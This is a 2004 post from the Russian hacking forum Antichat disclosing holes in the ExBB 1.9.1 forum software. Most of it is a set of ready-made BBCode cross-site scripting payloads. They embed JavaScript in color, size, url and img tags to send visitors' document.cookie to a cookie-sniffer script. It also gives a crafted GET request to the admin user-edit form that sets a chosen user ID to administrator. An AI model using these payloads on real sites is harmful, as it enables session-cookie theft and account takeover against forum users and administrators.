Форум АНТИЧАТ - Xss в exbb 1.9.1

19.10.2004, 00:53

zFailure

Участник форума

Регистрация: 06.06.2004

Сообщений: 169

Провел на форуме:
0

Репутация: 82

Отправить сообщение для zFailure с помощью ICQ

Адрес сниффера: http://antichat.ru/cgi-bin/s.jpg

XSS в каждом теге
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[color='z=]'style='background:url(javasc ript:document.images[0].src="http://localhost/1.php?"+document.cookie)'[/color]
[size='z="]"style='background:url(javascript:docum ent.images[0].src="http://localhost/1.php?"+document.cookie)'[/size]
[url]'z="style='background:url(javascript:document .images[0].src=/http:@@localhost@1.php?/.source.replace(/@/g,String.fromCharCode(47))+document.cookie)'[/url]
[url="]"style='background:url(javascript:document. images[0].src="http://localhost/1.php?"+document.cookie)'[/url]
[img]http://"z='[/img]'style='background:url(javascript:document.ima ges[0].src="http://localhost/1.php?"+document.cookie)'
[img]"onerror="document.images[0].src='http://localhost/1.php'+String.fromCharCode(63)+document.cookie[/img][/QUOTE]<span id='postcolor'>

кроме xss есть еще одна бага
форма редактирования пользователей из админки передается методом GET
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://localhost/exbb/setmembers.php?action=edit_user&checkaction=ye s&userid=3&membertitle=&emailaddress=l ol@lol.ru&newname=lol&password=&homepa ge=&aolname=&icqnumber=&location=& interests=&signature=&numberofposts=0& avatar=noavatar.gif&membercode=ad&submit=% CE%F2%EF%F0%E0%E2%E8%F2%FC[/QUOTE]<span id='postcolor'>
userid=3 - id пользователя для поднятия прав
newname=ваше имя

http://video.antichat.ru/videos/zfailure/exbb_191.rar